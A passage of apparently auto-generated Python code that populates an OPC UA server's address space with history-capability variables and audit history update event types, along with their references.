ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2335, 0)
node.BrowseName = QualifiedName('ReplaceDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2336, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2337, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2338, 0)
node.BrowseName = QualifiedName('DeleteAtTimeCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11278, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11279, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11280, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11501, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11270, 0)
node.BrowseName = QualifiedName('InsertAnnotationCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertAnnotationCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11172, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2999, 0)
node.BrowseName = QualifiedName('AuditHistoryEventUpdateEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryEventUpdateEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3025, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3028, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3003, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3029, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3030, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3025, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3028, 0)
node.BrowseName = QualifiedName('PerformInsertReplace', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PerformInsertReplace")
attrs.DataType = NumericNodeId(11293, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3003, 0)
node.BrowseName = QualifiedName('Filter', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Filter")
attrs.DataType = NumericNodeId(725, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3029, 0)
node.BrowseName = QualifiedName('NewValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("NewValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3030, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3006, 0)
node.BrowseName = QualifiedName('AuditHistoryValueUpdateEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryValueUpdateEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3026, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3031, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3032, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3033, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3026, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3031, 0)
node.BrowseName = QualifiedName('PerformInsertReplace', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PerformInsertReplace")
attrs.DataType = NumericNodeId(11293, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3032, 0)
node.BrowseName = QualifiedName('NewValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("NewValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3033, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
